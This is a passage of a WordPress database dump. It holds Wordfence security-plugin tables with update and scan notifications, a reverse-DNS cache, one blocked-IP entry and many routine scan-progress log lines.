('site-C4AAAAA', 0, 'wfplugin_updates', 502, 1692203079, '<a href="https://www.happythinking.com/wp-admin/update-core.php">An update is available for 1 plugin</a>', '[]'),
('site-DAAAAAA', 0, 'wfplugin_scan', 502, 1692117707, '<a href="https://www.happythinking.com/wp-admin/admin.php?page=WordfenceScan">1 issue found in most recent scan</a>', '[]'),
('site-DIAAAAA', 0, 'wfplugin_updates', 502, 1692721489, '<a href="https://www.happythinking.com/wp-admin/update-core.php">An update is available for 1 theme</a>', '[]'),
('site-DUAAAAA', 0, 'wfplugin_scan', 502, 1692725334, '<a href="https://www.happythinking.com/wp-admin/admin.php?page=WordfenceScan">1 issue found in most recent scan</a>', '[]'),
('site-DYAAAAA', 0, 'wfplugin_updates', 502, 1693502208, '<a href="https://www.happythinking.com/wp-admin/update-core.php">An update is available for 1 theme</a>', '[]'),
('site-D4AAAAA', 0, 'wfplugin_scan', 502, 1693502242, '<a href="https://www.happythinking.com/wp-admin/admin.php?page=WordfenceScan">1 issue found in most recent scan</a>', '[]'),
('site-EQAAAAA', 0, 'wfplugin_updates', 502, 1693930896, '<a href="https://www.happythinking.com/wp-admin/update-core.php">An update is available for 1 plugin</a>', '[]'),
('site-EUAAAAA', 0, 'wfplugin_scan', 502, 1693846088, '<a href="https://www.happythinking.com/wp-admin/admin.php?page=WordfenceScan">1 issue found in most recent scan</a>', '[]'),
('site-E4AAAAA', 0, 'wfplugin_updates', 502, 1694678140, '<a href="https://www.happythinking.com/wp-admin/update-core.php">An update is available for 1 plugin</a>', '[]'),
('site-FAAAAAA', 0, 'wfplugin_updates', 502, 1695109552, '<a href="https://www.happythinking.com/wp-admin/update-core.php">An update is available for 1 plugin</a>', '[]'),
('site-FEAAAAA', 0, 'wfplugin_updates', 502, 1700595656, '<a href="https://www.happythinking.com/wp-admin/update-core.php">An update is available for 1 theme</a>', '[]'),
('site-FMAAAAA', 0, 'wfplugin_updates', 502, 1701201064, '<a href="https://www.happythinking.com/wp-admin/update-core.php">An update is available for 2 plugins</a>', '[]'),
('site-FQAAAAA', 0, 'wfplugin_updates', 502, 1702669471, '<a href="https://www.happythinking.com/wp-admin/update-core.php">An update is available for 1 plugin</a>', '[]'),
('site-FUAAAAA', 0, 'wfplugin_updates', 502, 1704225440, '<a href="https://www.happythinking.com/wp-admin/update-core.php">An update is available for 1 plugin</a>', '[]'),
('site-FYAAAAA', 0, 'wfplugin_updates', 502, 1704485408, '<a href="https://www.happythinking.com/wp-admin/update-core.php">An update is available for 1 theme</a>', '[]'),
('site-F4AAAAA', 0, 'wfplugin_scan', 502, 1704485411, '<a href="https://www.happythinking.com/wp-admin/admin.php?page=WordfenceScan">1 issue found in most recent scan</a>', '[]'),
('site-GAAAAAA', 0, 'wfplugin_updates', 502, 1704832479, '<a href="https://www.happythinking.com/wp-admin/update-core.php">An update is available for 1 theme</a>', '[]'),
('site-GMAAAAA', 0, 'wfplugin_scan', 502, 1704832482, '<a href="https://www.happythinking.com/wp-admin/admin.php?page=WordfenceScan">1 issue found in most recent scan</a>', '[]'),
('site-GQAAAAA', 0, 'wfplugin_updates', 502, 1705563778, '<a href="https://www.happythinking.com/wp-admin/update-core.php">An update is available for 1 plugin</a>', '[]'),
('site-GUAAAAA', 0, 'wfplugin_updates', 502, 1705695752, '<a href="https://www.happythinking.com/wp-admin/update-core.php">An update is available for 1 plugin</a>', '[]'),
('site-GYAAAAA', 0, 'wfplugin_updates', 502, 1706042108, '<a href="https://www.happythinking.com/wp-admin/update-core.php">An update is available for 1 theme</a>', '[]'),
('site-HEAAAAA', 0, 'wfplugin_scan', 502, 1706042113, '<a href="https://www.happythinking.com/wp-admin/admin.php?page=WordfenceScan">1 issue found in most recent scan</a>', '[]'),
('site-HIAAAAA', 0, 'wfplugin_updates', 502, 1706212696, '<a href="https://www.happythinking.com/wp-admin/update-core.php">An update is available for 1 plugin</a>', '[]'),
('site-HMAAAAA', 0, 'wfplugin_updates', 502, 1707248750, '<a href="https://www.happythinking.com/wp-admin/update-core.php">An update is available for 1 plugin</a>', '[]'),
('site-HQAAAAA', 0, 'wfplugin_scan', 502, 1707768279, '<a href="https://www.happythinking.com/wp-admin/admin.php?page=WordfenceScan">1 issue found in most recent scan</a>', '[]'),
('site-HUAAAAA', 0, 'wfplugin_updates', 502, 1707768276, '<a href="https://www.happythinking.com/wp-admin/update-core.php">An update is available for 1 theme</a>', '[]'),
('site-IAAAAAA', 0, 'wfplugin_updates', 502, 1707941939, '<a href="https://www.happythinking.com/wp-admin/update-core.php">An update is available for 1 plugin</a>', '[]'),
('site-IEAAAAA', 0, 'wfplugin_updates', 502, 1708028372, '<a href="https://www.happythinking.com/wp-admin/update-core.php">An update is available for 1 plugin</a>', '[]'),
('site-IIAAAAA', 0, 'wfplugin_updates', 502, 1708459759, '<a href="https://www.happythinking.com/wp-admin/update-core.php">An update is available for 1 plugin</a>', '[]'),
('site-IMAAAAA', 0, 'wfplugin_updates', 502, 1709670506, '<a href="https://www.happythinking.com/wp-admin/update-core.php">An update is available for 1 theme</a>', '[]'),
('site-IQAAAAA', 0, 'wfplugin_scan', 502, 1709685290, '<a href="https://www.happythinking.com/wp-admin/admin.php?page=WordfenceScan">1 issue found in most recent scan</a>', '[]'),
('site-JQAAAAA', 0, 'wfplugin_updates', 502, 1709843101, '<a href="https://www.happythinking.com/wp-admin/update-core.php">An update is available for 1 theme</a>', '[]'),
('site-JUAAAAA', 0, 'wfplugin_scan', 502, 1709863999, '<a href="https://www.happythinking.com/wp-admin/admin.php?page=WordfenceScan">1 issue found in most recent scan</a>', '[]'),
('site-JYAAAAA', 0, 'wfplugin_updates', 502, 1711007031, '<a href="https://www.happythinking.com/wp-admin/update-core.php">An update is available for 1 theme</a>', '[]'),
('site-KAAAAAA', 0, 'wfplugin_scan', 502, 1712206411, '<a href="https://www.happythinking.com/wp-admin/admin.php?page=WordfenceScan">2 issues found in most recent scan</a>', '[]'),
('site-KEAAAAA', 0, 'wfplugin_updates', 502, 1712174022, '<a href="https://www.happythinking.com/wp-admin/update-core.php">An update is available for 2 themes</a>', '[]');

-- --------------------------------------------------------

--
-- Table structure for table `wpou_wfpendingissues`
--

CREATE TABLE `wpou_wfpendingissues` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `time` int(10) unsigned NOT NULL,
  `lastUpdated` int(10) unsigned NOT NULL,
  `status` varchar(10) NOT NULL,
  `type` varchar(20) NOT NULL,
  `severity` tinyint(3) unsigned NOT NULL,
  `ignoreP` char(32) NOT NULL,
  `ignoreC` char(32) NOT NULL,
  `shortMsg` varchar(255) NOT NULL,
  `longMsg` text DEFAULT NULL,
  `data` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `lastUpdated` (`lastUpdated`),
  KEY `status` (`status`),
  KEY `ignoreP` (`ignoreP`),
  KEY `ignoreC` (`ignoreC`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `wpou_wfreversecache`
--

CREATE TABLE `wpou_wfreversecache` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `host` varchar(255) NOT NULL,
  `lastUpdate` int(10) unsigned NOT NULL,
  PRIMARY KEY (`IP`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `wpou_wfreversecache`
--

INSERT INTO `wpou_wfreversecache` VALUES
('\0\0\0\0\0\0\0\0\0\0ÿÿBùA«', 'crawl-66-249-65-171.googlebot.com', 1712615228),
('\0\0\0\0\0\0\0\0\0\0ÿÿBùAª', 'crawl-66-249-65-170.googlebot.com', 1712639497);

-- --------------------------------------------------------

--
-- Table structure for table `wpou_wfsecurityevents`
--

CREATE TABLE `wpou_wfsecurityevents` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `type` varchar(255) NOT NULL DEFAULT '',
  `data` text NOT NULL,
  `event_time` double(14,4) NOT NULL,
  `state` enum('new','sending','sent') NOT NULL DEFAULT 'new',
  `state_timestamp` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `wpou_wfsnipcache`
--

CREATE TABLE `wpou_wfsnipcache` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `IP` varchar(45) NOT NULL DEFAULT '',
  `expiration` timestamp NOT NULL DEFAULT current_timestamp(),
  `body` varchar(255) NOT NULL DEFAULT '',
  `count` int(10) unsigned NOT NULL DEFAULT 0,
  `type` int(10) unsigned NOT NULL DEFAULT 0,
  PRIMARY KEY (`id`),
  KEY `expiration` (`expiration`),
  KEY `IP` (`IP`),
  KEY `type` (`type`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `wpou_wfsnipcache`
--

INSERT INTO `wpou_wfsnipcache` VALUES
(9563, '143.198.93.185', '2024-04-10 13:29:23', 'BLOCKED:600', 0, 2);

-- --------------------------------------------------------

--
-- Table structure for table `wpou_wfstatus`
--

CREATE TABLE `wpou_wfstatus` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `ctime` double(17,6) unsigned NOT NULL,
  `level` tinyint(3) unsigned NOT NULL,
  `type` char(5) NOT NULL,
  `msg` varchar(1000) NOT NULL,
  PRIMARY KEY (`id`),
  KEY `k1` (`ctime`),
  KEY `k2` (`type`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `wpou_wfstatus`
--

INSERT INTO `wpou_wfstatus` VALUES
(16418, 1712638405.693565, 10, 'info', 'SUM_START:Scanning for old themes, plugins and core files'),
(15375, 1711082860.582345, 1, 'info', 'Quick Scan Complete. Scanned in less than 1 second.'),
(16574, 1712725023.634094, 10, 'info', 'SUM_ENDOK:Scanning for old themes, plugins and core files'),
(16163, 1712162964.067538, 2, 'info', 'Analyzed 4300 files containing 72.14 MB of data so far'),
(16164, 1712162964.153348, 2, 'info', 'Analyzed 4400 files containing 72.24 MB of data so far'),
(16165, 1712162964.244236, 2, 'info', 'Analyzed 4500 files containing 72.47 MB of data so far'),
(15661, 1711384969.597059, 2, 'info', 'Scanned contents of 18 additional files at 17.99 per second'),
(15660, 1711384968.594585, 2, 'info', 'Starting scan of file contents'),
(15353, 1710914957.563520, 1, 'info', '-------------------'),
(15354, 1710914957.564392, 2, 'info', 'Wordfence used 0 B of memory for scan. Server peak memory usage was: 66.5 MB'),
(16425, 1712681573.516488, 10, 'info', 'SUM_PREP:Preparing a new scan.'),
(16062, 1712033088.874623, 1, 'info', '-------------------'),
(16027, 1711903818.890497, 2, 'info', 'Done examining URLs'),
(16026, 1711903818.890031, 2, 'info', 'Examining URLs found in posts we scanned for dangerous websites'),
(16109, 1712162953.674044, 2, 'info', '500 files indexed'),
(16110, 1712162953.724301, 2, 'info', '1000 files indexed'),
(16111, 1712162953.774110, 2, 'info', '1500 files indexed'),
(16112, 1712162953.795207, 2, 'info', '2000 files indexed'),
(15276, 1710867653.844667, 2, 'info', 'Analyzed 2800 files containing 45.23 MB of data so far'),
(15277, 1710867654.475504, 2, 'info', 'Analyzed 2900 files containing 51.91 MB of data so far'),
(16394, 1712469388.163630, 10, 'info', 'SUM_PREP:Preparing a new scan.'),
(15317, 1710867668.114306, 2, 'info', 'Scanned contents of 50 additional files at 16.34 per second'),
(15710, 1711515126.798073, 1, 'info', '-------------------'),
(15797, 1711645540.999114, 2, 'info', 'Analyzed 2900 files containing 52.16 MB of data so far'),
(15796, 1711645540.334655, 2, 'info', 'Analyzed 2800 files containing 45.15 MB of data so far'),
(16330, 1712422405.211488, 2, 'info', 'Analyzed 3700 files containing 69.62 MB of data so far'),
(16331, 1712422405.471331, 2, 'info', 'Analyzed 3800 files containing 70.41 MB of data so far'),
(15243, 1710867648.463006, 2, 'info', '3500 files indexed'),
(16078, 1712162946.011630, 1, 'info', 'Contacting Wordfence to initiate scan'),
(16401, 1712469388.408981, 2, 'info', 'Wordfence used 0 B of memory for scan. Server peak memory usage was: 73.5 MB'),
(15845, 1711645562.694028, 2, 'info', 'Done host key check.'),
(15413, 1711128790.508887, 2, 'info', '2000 files indexed'),
(15846, 1711645562.700494, 2, 'info', 'Done file contents scan'),
(16440, 1712681580.053713, 10, 'info', 'SUM_START:Checking for paths skipped due to scan settings'),
(16301, 1712422391.480404, 2, 'info', 'Analyzed 800 files containing 16.38 MB of data so far'),
(16302, 1712422391.973890, 2, 'info', 'Analyzed 900 files containing 16.87 MB of data so far'),
(16303, 1712422392.402835, 2, 'info', 'Analyzed 1000 files containing 17.22 MB of data so far'),
(16304, 1712422392.807549, 2, 'info', 'Analyzed 1100 files containing 18.42 MB of data so far'),
(15782, 1711645534.714189, 2, 'info', 'Analyzed 1400 files containing 27.01 MB of data so far'),
(16490, 1712681585.066227, 2, 'info', 'Analyzed 2200 files containing 33.89 MB of data so far'),
(16157, 1712162961.294117, 2, 'info', 'Analyzed 3700 files containing 69.1 MB of data so far'),
(16435, 1712681580.021461, 10, 'info', 'SUM_ENDOK:Scanning to check available disk space'),
(16052, 1711952832.735196, 1, 'info', '-------------------'),
(16053, 1711952832.736136, 2, 'info', 'Wordfence used 0 B of memory for scan. Server peak memory usage was: 68.5 MB'),
(16054, 1711952832.748261, 1, 'info', 'Quick Scan Complete. Scanned in less than 1 second.'),
(15721, 1711599503.910677, 2, 'info', 'Wordfence used 0 B of memory for scan. Server peak memory usage was: 66.5 MB'),
(15795, 1711645540.178677, 2, 'info', 'Analyzed 2700 files containing 44.1 MB of data so far'),
(15794, 1711645540.044862, 2, 'info', 'Analyzed 2600 files containing 42.88 MB of data so far'),
(16151, 1712162960.155275, 2, 'info', 'Analyzed 3100 files containing 57.89 MB of data so far'),
(16150, 1712162959.762313, 2, 'info', 'Analyzed 3000 files containing 54.34 MB of data so far'),
(16463, 1712681580.758742, 2, 'info', '3500 files indexed'),
(15295, 1710867659.865379, 2, 'info', 'Analyzed 4700 files containing 75.82 MB of data so far'),
(16530, 1712681599.732211, 10, 'info', 'SUM_START:Check for publicly accessible configuration files, backup files and logs'),
(16400, 1712469388.408093, 1, 'info', '-------------------'),
(16537, 1712681607.395594, 2, 'info', 'Scanned contents of 16 additional files at 3.24 per second'),
(16534, 1712681602.448690, 2, 'info', 'Starting scan of file contents'),
(16535, 1712681603.517516, 2, 'info', 'Scanned contents of 7 additional files at 6.56 per second'),
(16536, 1712681604.523482, 2, 'info', 'Scanned contents of 13 additional files at 6.27 per second'),
(15547, 1711341563.120219, 2, 'info', 'Wordfence used 0 B of memory for scan. Server peak memory usage was: 66.5 MB'),
(16310, 1712422397.909403, 2, 'info', 'Analyzed 1700 files containing 27.7 MB of data so far'),
(15995, 1711903809.643072, 2, 'info', 'Analyzed 4900 files containing 80.38 MB of data so far'),
(15247, 1710867648.598062, 2, 'info', '5500 files indexed'),
(15246, 1710867648.535718, 2, 'info', '5000 files indexed'),
(16434, 1712681580.021160, 2, 'info', 'The disk has 1717449.13 MB available'),
(15521, 1711172740.448099, 1, 'info', 'Initiating quick scan'),
(15779, 1711645533.691636, 2, 'info', 'Analyzed 1100 files containing 19.09 MB of data so far'),
(16476, 1712681582.669471, 2, 'info', 'Analyzed 800 files containing 16.38 MB of data so far'),
(15288, 1710867659.094274, 2, 'info', 'Analyzed 4000 files containing 71.38 MB of data so far'),
(16190, 1712162971.825486, 2, 'info', 'Asking Wordfence to check URLs against malware list.'),
(15475, 1711128803.195467, 2, 'info', 'Analyzed 5400 files containing 106.1 MB of data so far'),
(16399, 1712469388.404918, 10, 'info', 'SUM_ENDOK:Scanning for old themes, plugins and core files'),
(16280, 1712422387.433320, 10, 'info', 'SUM_START:Scanning for known malware files'),
(16477, 1712681582.777439, 2, 'info', 'Analyzed 900 files containing 16.87 MB of data so far'),
(15526, 1711172740.690190, 1, 'info', '-------------------'),
(15552, 1711384941.624569, 1, 'info', 'Contacting Wordfence to initiate scan'),
(15431, 1711128792.846259, 2, 'info', 'Analyzed 1000 files containing 18.15 MB of data so far'),
(15785, 1711645537.693040, 2, 'info', 'Analyzed 1700 files containing 28.51 MB of data so far'),
(15430, 1711128792.702448, 2, 'info', 'Analyzed 900 files containing 17.82 MB of data so far'),
(16388, 1712422425.190525, 2, 'info', 'Done examining URLs'),
(15625, 1711384957.961759, 2, 'info', 'Analyzed 3100 files containing 58.06 MB of data so far'),
(15626, 1711384960.690565, 2, 'info', 'Analyzed 3200 files containing 61.7 MB of data so far'),
(15784, 1711645537.597612, 2, 'info', 'Analyzed 1600 files containing 28.08 MB of data so far'),
(16140, 1712162957.399528, 2, 'info', 'Analyzed 2000 files containing 29.8 MB of data so far'),
(15701, 1711428789.002490, 2, 'info', 'Wordfence used 0 B of memory for scan. Server peak memory usage was: 66.5 MB'),
(16072, 1712119912.921566, 1, 'info', '-------------------'),
(16417, 1712638405.689938, 10, 'info', 'SUM_ENDOK:Checking Web Application Firewall status'),
(15289, 1710867659.193206, 2, 'info', 'Analyzed 4100 files containing 71.65 MB of data so far'),
(15773, 1711645532.391517, 2, 'info', 'Analyzed 500 files containing 14.27 MB of data so far'),
(15398, 1711128789.684078, 2, 'info', 'Found 4 themes'),
(16404, 1712552811.761311, 10, 'info', 'SUM_PREP:Preparing a new scan.'),
(16085, 1712162952.438751, 2, 'info', 'Total disk space: 13.85 TB -- Free disk space: 1.69 TB'),
(16299, 1712422390.993351, 2, 'info', 'Analyzed 600 files containing 14.57 MB of data so far'),
(16298, 1712422390.668257, 2, 'info', 'Analyzed 500 files containing 13.57 MB of data so far'),
(15700, 1711428789.001715, 1, 'info', '-------------------'),
(16407, 1712552811.946517, 10, 'info', 'SUM_ENDOK:Checking Web Application Firewall status'),
(15470, 1711128800.685895, 2, 'info', 'Analyzed 4900 files containing 80.47 MB of data so far'),
(16366, 1712422423.218266, 2, 'info', 'Checking 65 host keys against Wordfence scanning servers.'),
(16365, 1712422423.217354, 2, 'info', 'Asking Wordfence to check URLs against malware list.'),
(16538, 1712681608.454690, 2, 'info', 'Scanned contents of 22 additional files at 3.66 per second'),
(15993, 1711903809.147318, 2, 'info', 'Analyzed 4700 files containing 75.74 MB of data so far'),
(15345, 1710867669.782124, 1, 'info', 'Scan Complete. Scanned 5741 files, 6 plugins, 4 themes, 22 posts, 0 comments and 173 URLs in 30 seconds.'),
(15977, 1711903802.589017, 2, 'info', 'Analyzed 3100 files containing 57.94 MB of data so far'),
(15695, 1711428788.717522, 1, 'info', 'Initiating quick scan'),
(16507, 1712681590.095313, 2, 'info', 'Analyzed 3900 files containing 71.07 MB of data so far'),
(15491, 1711128807.870324, 2, 'info', 'Asking Wordfence to check URLs against malware list.'),
(15492, 1711128807.871297, 2, 'info', 'Checking 202 host keys against Wordfence scanning servers.'),
(15493, 1711128808.098469, 2, 'info', 'Done host key check.'),
(15494, 1711128808.112522, 2, 'info', 'Done file contents scan'),
(15964, 1711903799.331338, 2, 'info', 'Analyzed 1800 files containing 28.74 MB of data so far'),
(15963, 1711903799.262575, 2, 'info', 'Analyzed 1700 files containing 28.51 MB of data so far'),
(15460, 1711128798.391340, 2, 'info', 'Analyzed 3900 files containing 71.13 MB of data so far'),
(15459, 1711128798.282382, 2, 'info', 'Analyzed 3800 files containing 70.38 MB of data so far'),
(16449, 1712681580.605283, 10, 'info', 'SUM_ENDSUCCESS:Fetching list of known malware files from Wordfence'),
(16450, 1712681580.608063, 10, 'info', 'SUM_START:Fetching list of known core files from Wordfence'),
(16451, 1712681580.608994, 10, 'info', 'SUM_ENDSUCCESS:Fetching list of known core files from Wordfence'),
(16452, 1712681580.611553, 10, 'info', 'SUM_START:Comparing core WordPress files against originals in repository'),
(16168, 1712162964.806375, 2, 'info', 'Analyzed 4800 files containing 78.66 MB of data so far'),
(16287, 1712422387.973178, 2, 'info', '3000 files indexed'),
(16259, 1712422386.536876, 2, 'info', 'The disk has 1746668.3 MB available'),
(15548, 1711341563.123679, 1, 'info', 'Quick Scan Complete. Scanned in 1 second.'),
(15999, 1711903812.101676, 2, 'info', 'Analyzed 5300 files containing 103.96 MB of data so far'),
(16240, 1712376298.496349, 1, 'info', 'Initiating quick scan'),
(16237, 1712294463.029273, 1, 'info', 'Quick Scan Complete. Scanned in 1 second.'),
(15898, 1711858491.135975, 1, 'info', '-------------------'),
(16339, 1712422406.929460, 2, 'info', 'Analyzed 4600 files containing 73.74 MB of data so far'),
(16113, 1712162953.832120, 2, 'info', '2500 files indexed'),
(16114, 1712162953.860137, 2, 'info', '3000 files indexed'),
(16115, 1712162953.884137, 2, 'info', '3500 files indexed'),
(16116, 1712162953.906874, 2, 'info', '4000 files indexed'),
(16358, 1712422416.274652, 10, 'info', 'SUM_START:Scanning file contents for URLs on a domain blocklist'),
(16359, 1712422417.939527, 2, 'info', 'Starting scan of file contents'),
(15318, 1710867668.114555, 2, 'info', 'Asking Wordfence to check URLs against malware list.'),
(15319, 1710867668.115537, 2, 'info', 'Checking 159 host keys against Wordfence scanning servers.'),
(15320, 1710867668.336390, 2, 'info', 'Done host key check.'),
(15321, 1710867668.343336, 2, 'info', 'Done file contents scan'),
(16297, 1712422390.250237, 2, 'info', 'Analyzed 400 files containing 12.11 MB of data so far'),
(16295, 1712422388.728169, 2, 'info', 'Analyzed 200 files containing 2.39 MB of data so far'),
(16296, 1712422389.061545, 2, 'info', 'Analyzed 300 files containing 3.63 MB of data so far'),
(15838, 1711645558.876581, 2, 'info', 'Scanned contents of 31 additional files at 4.14 per second'),
(15837, 1711645557.827101, 2, 'info', 'Scanned contents of 20 additional files at 3.11 per second'),
(15836, 1711645556.700381, 2, 'info', 'Scanned contents of 6 additional files at 1.13 per second'),
(15835, 1711645552.792887, 2, 'info', 'Scanned contents of 3 additional files at 2.14 per second'),
(15479, 1711128803.904344, 2, 'info', 'Analyzed 5741 files containing 114.23 MB of data.'),
(16327, 1712422403.801652, 2, 'info', 'Analyzed 3400 files containing 64.06 MB of data so far'),
(15441, 1711128794.202243, 2, 'info', 'Analyzed 2000 files containing 29.8 MB of data so far'),
(16016, 1711903818.555000, 2, 'info', 'Scanned contents of 51 additional files at 12.71 per second'),
(16015, 1711903817.908687, 2, 'info', 'Scanned contents of 45 additional files at 13.37 per second'),
(16014, 1711903816.588485, 2, 'info', 'Scanned contents of 41 additional files at 20.04 per second'),
(15675, 1711384973.138741, 2, 'info', 'Done examining URLs'),
(16485, 1712681584.264340, 2, 'info', 'Analyzed 1700 files containing 27.7 MB of data so far'),
(15770, 1711645530.971786, 2, 'info', 'Analyzed 200 files containing 2.37 MB of data so far'),
(15774, 1711645532.793849, 2, 'info', 'Analyzed 600 files containing 15.54 MB of data so far'),
(16345, 1712422410.901354, 2, 'info', 'Analyzed 5200 files containing 102.27 MB of data so far'),
(16346, 1712422411.095827, 2, 'info', 'Analyzed 5300 files containing 103.61 MB of data so far'),
(16347, 1712422411.732832, 2, 'info', 'Analyzed 5400 files containing 106.06 MB of data so far'),
(16565, 1712681611.108299, 1, 'info', '-------------------'),
(15631, 1711384961.658569, 2, 'info', 'Analyzed 3700 files containing 69.04 MB of data so far'),
(15630, 1711384961.506745, 2, 'info', 'Analyzed 3600 files containing 68.09 MB of data so far'),
(15487, 1711128804.936918, 2, 'info', 'Starting scan of file contents'),
(15870, 1711645564.764894, 1, 'info', 'Scan Complete. Scanned 5740 files, 6 plugins, 4 themes, 22 posts, 0 comments and 142 URLs in 45 seconds.'),
(16577, 1712725023.640486, 1, 'info', 'Quick Scan Complete. Scanned in less than 1 second.'),
(16578, 1712725023.641045, 10, 'info', 'SUM_FINAL:Scan complete. Congratulations, no new problems found.'),
(16443, 1712681580.065444, 2, 'info', 'Found 6 plugins'),
(16444, 1712681580.065694, 2, 'info', 'Getting theme list from WordPress'),
(16442, 1712681580.063222, 2, 'info', 'Getting plugin list from WordPress'),
(16039, 1711903820.406159, 2, 'info', 'Examining URLs found in the options we scanned for dangerous websites'),
(15806, 1711645543.335215, 2, 'info', 'Analyzed 3800 files containing 70.27 MB of data so far'),
(16527, 1712681599.638650, 10, 'info', 'SUM_ENDOK:Comparing core WordPress files against originals in repository'),
(15513, 1711128809.402455, 2, 'info', 'Examining URLs found in the options we scanned for dangerous websites'),
(15469, 1711128800.538265, 2, 'info', 'Analyzed 4800 files containing 78.54 MB of data so far'),
(15705, 1711515126.406429, 1, 'info', 'Initiating quick scan'),
(16217, 1712162973.689184, 1, 'info', 'Scan Complete. Scanned 5781 files, 6 plugins, 4 themes, 22 posts, 0 comments and 146 URLs in 27 seconds.'),
(15823, 1711645549.040377, 2, 'info', 'Analyzed 5500 files containing 110.27 MB of data so far'),
(15560, 1711384948.055362, 2, 'info', 'The disk has 1767444.64 MB available'),
(15824, 1711645549.201390, 2, 'info', 'Analyzed 5600 files containing 112.02 MB of data so far'),
(15825, 1711645549.426476, 2, 'info', 'Analyzed 5700 files containing 113.42 MB of data so far'),
(15944, 1711903795.659757, 2, 'info', '5000 files indexed'),
(15945, 1711903795.689269, 2, 'info', '5500 files indexed'),
(15942, 1711903795.571199, 2, 'info', '4000 files indexed'),
(15943, 1711903795.625839, 2, 'info', '4500 files indexed'),
(15940, 1711903795.484076, 2, 'info', '3000 files indexed'),
(15941, 1711903795.545339, 2, 'info', '3500 files indexed'),
(15936, 1711903795.273984, 2, 'info', '1000 files indexed'),
(15937, 1711903795.335763, 2, 'info', '1500 files indexed'),
(15938, 1711903795.367803, 2, 'info', '2000 files indexed'),
(15939, 1711903795.443214, 2, 'info', '2500 files indexed'),
(15260, 1710867651.145583, 2, 'info', 'Analyzed 1200 files containing 22.04 MB of data so far'),
(15607, 1711384953.474673, 2, 'info', 'Analyzed 1300 files containing 26.68 MB of data so far'),
(15994, 1711903809.477365, 2, 'info', 'Analyzed 4800 files containing 78.43 MB of data so far'),
(15767, 1711645530.422151, 2, 'info', '5500 files indexed'),
(15768, 1711645530.444199, 2, 'info', '5740 files indexed'),
(15769, 1711645530.747867, 2, 'info', 'Analyzed 100 files containing 1.11 MB of data so far'),
(15303, 1710867663.535361, 2, 'info', 'Analyzed 5500 files containing 110.35 MB of data so far'),
(15304, 1710867663.675391, 2, 'info', 'Analyzed 5600 files containing 112.1 MB of data so far'),
(15305, 1710867663.882508, 2, 'info', 'Analyzed 5700 files containing 113.5 MB of data so far'),
(15306, 1710867663.914338, 2, 'info', 'Analyzed 5741 files containing 114.2 MB of data.'),
(15967, 1711903799.635592, 2, 'info', 'Analyzed 2100 files containing 30.11 MB of data so far'),
(15968, 1711903799.988737, 2, 'info', 'Analyzed 2200 files containing 33.27 MB of data so far'),
(15969, 1711903800.301239, 2, 'info', 'Analyzed 2300 files containing 36.37 MB of data so far'),
(15970, 1711903800.714731, 2, 'info', 'Analyzed 2400 files containing 41.44 MB of data so far'),
(15971, 1711903800.815756, 2, 'info', 'Analyzed 2500 files containing 41.93 MB of data so far'),
(15635, 1711384962.173773, 2, 'info', 'Analyzed 4100 files containing 71.68 MB of data so far'),
(15636, 1711384962.307171, 2, 'info', 'Analyzed 4200 files containing 71.98 MB of data so far'),
(15766, 1711645530.377643, 2, 'info', '5000 files indexed'),
(15765, 1711645530.343334, 2, 'info', '4500 files indexed'),
(15758, 1711645529.989124, 2, 'info', '1000 files indexed'),
(15759, 1711645530.032532, 2, 'info', '1500 files indexed'),
(15760, 1711645530.079454, 2, 'info', '2000 files indexed'),
(15761, 1711645530.142389, 2, 'info', '2500 files indexed'),
(15762, 1711645530.220843, 2, 'info', '3000 files indexed'),
(15763, 1711645530.270292, 2, 'info', '3500 files indexed'),
(15764, 1711645530.308384, 2, 'info', '4000 files indexed'),
(16522, 1712681596.529670, 2, 'info', 'Analyzed 5400 files containing 106.06 MB of data so far'),
(16286, 1712422387.866302, 2, 'info', '2500 files indexed'),
(16283, 1712422387.550615, 2, 'info', '1000 files indexed'),
(16284, 1712422387.570516, 2, 'info', '1500 files indexed'),
(16285, 1712422387.685100, 2, 'info', '2000 files indexed'),
(15873, 1711693176.933639, 1, 'info', 'Initiating quick scan'),
(16258, 1712422386.536575, 2, 'info', 'Total disk space: 13.85 TB -- Free disk space: 1.67 TB'),
(15949, 1711903796.235751, 2, 'info', 'Analyzed 300 files containing 3.61 MB of data so far'),
(15948, 1711903796.064649, 2, 'info', 'Analyzed 200 files containing 2.37 MB of data so far'),
(15506, 1711128808.189533, 2, 'info', 'Starting password strength check on 2 users.'),
(15947, 1711903795.896351, 2, 'info', 'Analyzed 100 files containing 1.11 MB of data so far'),
(15946, 1711903795.723501, 2, 'info', '5740 files indexed'),
(16192, 1712162972.053862, 2, 'info', 'Done host key check.'),
(16193, 1712162972.058103, 2, 'info', 'Done file contents scan'),
(16141, 1712162957.498287, 2, 'info', 'Analyzed 2100 files containing 30.11 MB of data so far'),
(16519, 1712681593.867385, 2, 'info', 'Analyzed 5100 files containing 98.64 MB of data so far'),
(16131, 1712162956.105410, 2, 'info', 'Analyzed 1100 files containing 19.09 MB of data so far'),
(16520, 1712681594.739381, 2, 'info', 'Analyzed 5200 files containing 102.27 MB of data so far'),
(15266, 1710867651.938136, 2, 'info', 'Analyzed 1800 files containing 28.71 MB of data so far'),
(15541, 1711341562.893839, 1, 'info', 'Initiating quick scan'),
(16013, 1711903815.561682, 2, 'info', 'Scanned contents of 20 additional files at 19.62 per second'),
(16306, 1712422397.536617, 2, 'info', 'Analyzed 1300 files containing 25.96 MB of data so far'),
(16305, 1712422397.057675, 2, 'info', 'Analyzed 1200 files containing 22.19 MB of data so far'),
